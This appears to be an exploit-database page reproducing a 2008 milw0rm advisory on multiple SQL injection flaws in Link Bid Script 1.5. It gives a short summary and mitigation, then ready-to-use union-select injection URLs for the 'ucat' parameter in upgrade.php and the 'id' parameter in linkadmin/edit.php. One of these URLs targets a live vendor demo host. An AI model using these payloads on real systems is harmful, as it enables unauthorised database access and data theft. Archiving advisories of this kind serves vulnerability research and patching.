header-logo
Suggest Exploit
vendor:
Link Bid Script 1.5
by:
SirGod
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Link Bid Script 1.5
Affected Version From: 1.5
Affected Version To: 1.5
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Link Bid Script 1.5 Multiple Remote SQL Injection

Link Bid Script 1.5 is vulnerable to multiple remote SQL injection attacks. An attacker can exploit this vulnerability by sending malicious SQL queries to the vulnerable application. This can be done by sending a specially crafted HTTP request to the vulnerable application. The vulnerable parameters are 'ucat' in upgrade.php and 'id' in edit.php.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to upgrade to the latest version of the application.
Source

Exploit-DB raw data:

#################################################################################################################
[+] Link Bid Script 1.5 Multiple Remote SQL Injection
[+] Discovered By SirGod
[+] wWw.MorTal-TeaM.OrG
[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,HrN,kemrayz,007m,Raven,Nytr0gen,str0ke
#################################################################################################################

[+] Remote SQL Injection


  - Note : For PoC 2 you need administrative rights.

     PoC 1 :

       http://[target]/[path]/upgrade.php?ucat=[SQL]

     Example 1 :

       http://127.0.0.1/linkbid/upgrade.php?ucat=-1086 union all
select 1,2,3,version(),database(),6,user(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35--

     Live Demo 1 :

       http://demo.linkbidscript.com/upgrade.php?ucat=-1086 union all
select 1,2,3,version(),database(),6,user(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35--


-----------------------------------------------------------------------------------------------------------------

     PoC 2 :

       http://[target]/[path]/linkadmin/edit.php?id=[SQL]

     Example 2 :

       http://127.0.0.1/linkbid/linkadmin/edit.php?id=-1 union all
select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35--

#################################################################################################################

# milw0rm.com [2008-09-15]